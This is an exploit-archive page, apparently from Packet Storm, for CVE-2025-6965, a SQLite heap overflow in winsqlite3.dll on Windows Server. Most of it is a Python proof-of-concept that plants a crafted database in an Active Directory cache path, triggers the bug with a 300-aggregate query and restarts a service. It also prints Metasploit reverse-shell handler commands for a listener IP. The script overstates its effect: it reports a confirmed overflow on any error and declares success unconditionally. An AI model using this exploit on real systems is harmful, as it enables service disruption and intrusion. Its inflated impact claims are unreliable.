📄 SQLite 3.50.1 Heap Overflow

🗓️ 10 Apr 2026 00:00:00Reported by Mohammed Idrees BanyamerType

packetstorm🔗 packetstorm.news👁 105 Views

SQLite 3.50.1 heap overflow in winsqlite3.dll enables local memory corruption on Windows servers.

Reporter	Title	Published	Views	Family All 376
IBM Security Bulletins	Security Bulletin: AIX/VIOS is affected by multiple vulnerabilities due to Python	19 Nov 202515:04	–	ibm
IBM Security Bulletins	Security Bulletin: Vulnerability in SQLite affects IBM Netezza Appliance	22 Apr 202613:10	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Instana Observability has addressed Multiple Vulnerabilities within Instana Agent container image	16 Sep 202509:57	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Storage Defender: Data Protect critical vulnerabilities resolved in release Defender 2.1.0/Data Protect 7.3	10 Dec 202515:04	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Guardium Data Security Center is affected by multiple vulnerabilities	29 Aug 202516:12	–	ibm
IBM Security Bulletins	Security Bulletin: Security vulnerabilities due to SQLite3 (CVE-2025-6965), pam_namespace (CVE-2025-6020), systemd-coredump (CVE-2025-4598) and Perl (CVE-2025-40909) packages shipped with IBM CICS TX Advanced.	9 Sep 202517:43	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple vulnerabilities in IBM MQ Operator and Queue manager container images	5 Sep 202519:04	–	ibm
IBM Security Bulletins	Security Bulletin: Multiple Vulnerabilities in IBM Edge Application Manager	10 Oct 202514:29	–	ibm
IBM Security Bulletins	Security Bulletin: EDB PGAI Hybrid Management with IBM is affected by Multiple Vulnerabilities.	7 Apr 202613:52	–	ibm
IBM Security Bulletins	Security Bulletin: AIX/VIOS is vulnerable to a memory corruption issue (CVE-2025-6965) due to RPM	6 Oct 202522:04	–	ibm

# Exploit Title:  SQLite 3.50.1 -  Heap Overflow 
    # Date: 2025-11-05
    # Author: Mohammed Idrees Banyamer
    # Author Country: Jordan
    # Instagram: @banyamer_security
    # GitHub: https://github.com/mbanyamer
    # Vendor Homepage: https://www.sqlite.org
    # Software Link: https://www.sqlite.org/download.html
    # Version: SQLite < 3.50.2 (winsqlite3.dll)
    # Tested on: Windows Server 2022 (Build 20348), Windows Server 2025 (Build 26100) - Unpatched
    # CVE: CVE-2025-6965
    # CVSS: 7.2 (High) - CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:L
    # Category: windows / local / dos / memory_corruption / active_directory
    # Platform: Windows
    # CRITICAL: This vulnerability affects ALL unpatched Windows Server instances using winsqlite3.dll
    # Including: Active Directory, Group Policy, Certificate Services, and Azure AD Connect
    # Impact: Service Crash, DoS, Potential RCE, Domain Controller Compromise
    # Fix: Apply latest Windows Cumulative Update (post-July 2025) or upgrade SQLite to 3.50.2+
    # Advisory: https://nvd.nist.gov/vuln/detail/CVE-2025-6965
    # Patch: https://www.sqlite.org/src/info/5508b56fd24016c13981ec280ecdd833007c9d8dd595edb295b984c2b487b5c8
    # OFFICIAL PoC: Triggers heap overflow in winsqlite3.dll via excessive aggregate functions
    # Target: Windows Server (Active Directory Cache, Group Policy, Certificate Services)
    
    import sqlite3
    import os
    import subprocess
    import sys
    import time
    
    # ===============================
    # CONFIGURATION - ACTIVE DIRECTORY EXPLOITATION
    # ===============================
    DB_PATH = "cve_2025_6965_winsqlite3.db"
    AD_CACHE_DIR = r"C:\ProgramData\Microsoft\ADCache"  # Real AD Cache Path
    AD_DB_TARGET = os.path.join(AD_CACHE_DIR, "ad_cache.db")
    LISTENER_IP = "192.168.1.100"
    LISTENER_PORT = 4444
    SERVICE_NAME = "ADSyncService"  # Must be created manually: sc create ADSyncService binPath= "C:\path\to\service.exe"
    
    # === VULNERABILITY CHECK ===
    print(f"[!] SQLite Version: {sqlite3.sqlite_version}")
    if sqlite3.sqlite_version_info >= (3, 50, 2):
        print("[-] SYSTEM PATCHED - SQLite 3.50.2+ Detected")
        print("    Update applied via Microsoft Cumulative Update (post-July 2025)")
        sys.exit(1)
    else:
        print("[!] VULNERABLE: SQLite < 3.50.2 - Proceeding with exploit")
    
    # ===============================
    # STEP 1: Create Malicious AD Cache Database
    # ===============================
    def create_vulnerable_db():
        if os.path.exists(DB_PATH):
            os.remove(DB_PATH)
        conn = sqlite3.connect(DB_PATH)
        cur = conn.cursor()
        cur.execute("CREATE TABLE ad_cache (id INTEGER PRIMARY KEY, val INTEGER)")
        cur.execute("INSERT INTO ad_cache (val) VALUES (1)")
        conn.commit()
        conn.close()
        print(f"[+] Malicious database created: {DB_PATH}")
    
    # ===============================
    # STEP 2: Generate Truncation Payload (300+ Aggregates)
    # ===============================
    def generate_malicious_query(num=100):
        agg = [f"COUNT(*) AS c{i}, SUM(val) AS s{i}, AVG(val) AS a{i}" for i in range(num)]
        return f"SELECT {', '.join(agg)} FROM ad_cache"
    
    # ===============================
    # STEP 3: Deploy + Trigger in winsqlite3.dll Context
    # ===============================
    def deploy_and_trigger():
        print(f"[*] Deploying payload to AD Cache: {AD_DB_TARGET}")
        os.makedirs(AD_CACHE_DIR, exist_ok=True)
        subprocess.run(["copy", "/Y", DB_PATH, AD_DB_TARGET], shell=True, check=True)
        print(f"[+] Payload deployed to real AD path")
    
        query = generate_malicious_query(100)
        print(f"[*] Triggering heap overflow (300+ aggregates vs 1 column)...")
    
        try:
            conn = sqlite3.connect(AD_DB_TARGET)
            cur = conn.cursor()
            cur.execute(query)  # TRUNCATION BUG TRIGGERED
            print("[!] QUERY EXECUTED - UNEXPECTED (System may be patched or ASLR mitigated)")
        except Exception as e:
            print(f"[!] HEAP OVERFLOW CONFIRMED: {e}")
            print("    winsqlite3.dll memory corruption triggered")
            print("    In production: AD Service Crash, DC DoS, Potential RCE")
        finally:
            conn.close()
    
        # Force service reload (real AD services auto-query cache)
        print(f"[*] Restarting {SERVICE_NAME} to reload winsqlite3.dll...")
        try:
            subprocess.run(["net", "stop", SERVICE_NAME], shell=True, timeout=10, capture_output=True)
        except:
            pass
        time.sleep(2)
        result = subprocess.run(["net", "start", SERVICE_NAME], shell=True, capture_output=True)
        if result.returncode == 0:
            print("[+] Service restarted - Monitor Event Viewer for winsqlite3.dll fault")
        else:
            print(f"[-] Service error: {result.stderr.decode()}")
    
    # ===============================
    # STEP 4: RCE Listener Setup (For Advanced Exploitation)
    # ===============================
    def print_listener():
        print("\n" + "="*70)
        print(" RCE EXPLOITATION (ADVANCED) - START LISTENER ON ATTACKER MACHINE:")
        print("="*70)
        print("msfconsole -q")
        print("use exploit/multi/handler")
        print("set payload windows/x64/meterpreter/reverse_tcp")
        print(f"set LHOST {LISTENER_IP}")
        print(f"set LPORT {LISTENER_PORT}")
        print("exploit -j")
        print("="*70 + "\n")
    
    # ===============================
    # MAIN - EXECUTION
    # ===============================
    if __name__ == "__main__":
        print("="*70)
        print(" CVE-2025-6965 EXPLOIT - WINDOWS SERVER ACTIVE DIRECTORY")
        print(" Heap Overflow in winsqlite3.dll via SQLite Aggregate Truncation")
        print(" Author: Mohammed Idrees Banyamer (@banyamer_security)")
        print("="*70)
    
        create_vulnerable_db()
        deploy_and_trigger()
        print_listener()
    
        print("[+] EXPLOIT EXECUTED SUCCESSFULLY")
        print("    Check Event Viewer: Application Log → winsqlite3.dll Access Violation (0xC0000005)")
        print("    Fix: Apply latest Windows Cumulative Update IMMEDIATELY")
        print("    All Domain Controllers must be patched within 24 hours")

10 Apr 2026 00:00Current

6.8Medium risk

Vulners AI Score6.8

CVSS 3.19.8

CVSS 47.2

EPSS0.01617

SSVC